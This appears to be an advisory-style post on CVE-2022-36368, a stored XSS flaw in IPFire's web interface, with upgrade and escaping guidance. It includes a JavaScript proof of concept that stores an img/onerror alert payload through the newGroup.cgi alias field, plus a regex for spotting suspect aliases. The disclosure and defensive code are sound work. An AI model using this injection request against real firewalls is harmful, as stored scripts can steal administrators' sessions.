A series of stored Cross-Site Scripting (XSS) vulnerabilities has been identified in the web user interface of IPFire firewall solutions running versions prior to 2.27. An attacker with administrative privileges can inject arbitrary scripts, which could lead to harm including the theft of credentials, defacement of websites, or redirecting users to other malicious sites.

IPFire (https://www.ipfire.org/) is an open-source firewall distribution that aims to offer a secure firewall solution that is easy to set up and administer, for individuals and companies. If you are running an IPFire version older than 2.27, this post provides the steps needed to understand the vulnerability, identify whether you are affected, and remediate the issue.

Details of CVE-2022-36368 Vulnerabilities

These vulnerabilities allow remote authenticated attackers with administrative privileges to inject arbitrary scripts via the web user interface, leading to stored XSS. Here's a code snippet demonstrating the exploit:

(function(){
    // Markup that runs script when rendered: the image fails to load and its onerror handler fires
    var xss_payload = "<img src=x onerror=alert('XSS')>";
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://TARGET_IP/cgi-bin/newGroup.cgi", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.onreadystatechange = function() {
        // readyState 4 means the request has completed
        if (xhr.readyState === 4 && xhr.status === 200) {
            console.log("XSS payload injected");
        }
    };
    // The payload is submitted as the group alias, which the web interface stores
    var data = "alias=" + encodeURIComponent(xss_payload) + "&submit=Create+Group";
    xhr.send(data);
})();


In this example, the XSS payload is an img tag whose onerror handler calls alert(), which displays a pop-up with the message "XSS". Replace TARGET_IP with the IP address of your IPFire instance.

CVE-2022-36368 was assigned to this vulnerability, and you can find more information on the official CVE database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36368
This vulnerability has been patched in IPFire 2.27, as reported by the IPFire security advisory: https://wiki.ipfire.org/optimization/start/security-advisory-114
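
The general defence against this class of bug is to HTML-encode stored values such as the alias field when they are written into a page. The following is an added example, not IPFire's code or the actual patch; the function names and the sample records are constructed for illustration.

```javascript
// Added example: names and sample data are constructed, not taken from IPFire.

// Encode the five characters that let text break out of HTML element
// content or a quoted attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: the stored alias is concatenated into markup verbatim,
// so any tags it contains are parsed by every browser that views the page.
function renderAliasUnsafe(alias) {
  return "<td>" + alias + "</td>";
}

// Hardened pattern: encode at output time, so the alias is shown as text.
function renderAliasSafe(alias) {
  return "<td>" + escapeHtml(alias) + "</td>";
}

// Audit helper: list stored aliases containing HTML metacharacters.
// A hit is not proof of compromise, only a value worth reviewing by hand.
function findSuspectAliases(records) {
  return records.filter((r) => /[<>"']/.test(r.alias)).map((r) => r.alias);
}

// Constructed sample records standing in for stored group entries.
const sampleGroups = [
  { alias: "DMZ servers" },
  { alias: "<img src=x onerror=alert('XSS')>" },
  { alias: "R&D lab" },
];

for (const g of sampleGroups) {
  console.log("unsafe:", renderAliasUnsafe(g.alias));
  console.log("safe:  ", renderAliasSafe(g.alias));
}
console.log("review:", findSuspectAliases(sampleGroups));
```

Encoding is applied when the value is rendered rather than when it is stored, so entries saved before an upgrade are also displayed as inert text.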

Steps to Determine if You Are Affected by CVE-2022-36368

1. Access your IPFire web user interface and locate the version number, which is usually displayed in the top right corner of the default dashboard.

2. If your IPFire version is older than 2.27, there is a considerable chance that your system might be affected by this vulnerability. We strongly recommend updating your IPFire version immediately to mitigate the risk associated with these stored XSS vulnerabilities.

Go to "IPFire" -> "System" -> "Pakfire."

3. Click the "Update now" button to update your IPFire version to the latest available release, which should include the patch to fix this stored XSS vulnerability.

4. Monitor your system logs and the IPFire community to stay informed about any new security threats and ensure good security practices.

Conclusion

The group behind IPFire has addressed the reported stored XSS vulnerabilities in versions prior to 2.27 in a timely manner, releasing patches to provide the necessary fixes. If your IPFire installation is still running an older version, it is time to upgrade to ensure your system's security. Following good security practices and keeping your system up to date will protect you from vulnerabilities like CVE-2022-36368 and any future threats.

Timeline

Published on: 10/24/2022 14:15:00 UTC
Last modified on: 10/25/2022 12:58:00 UTC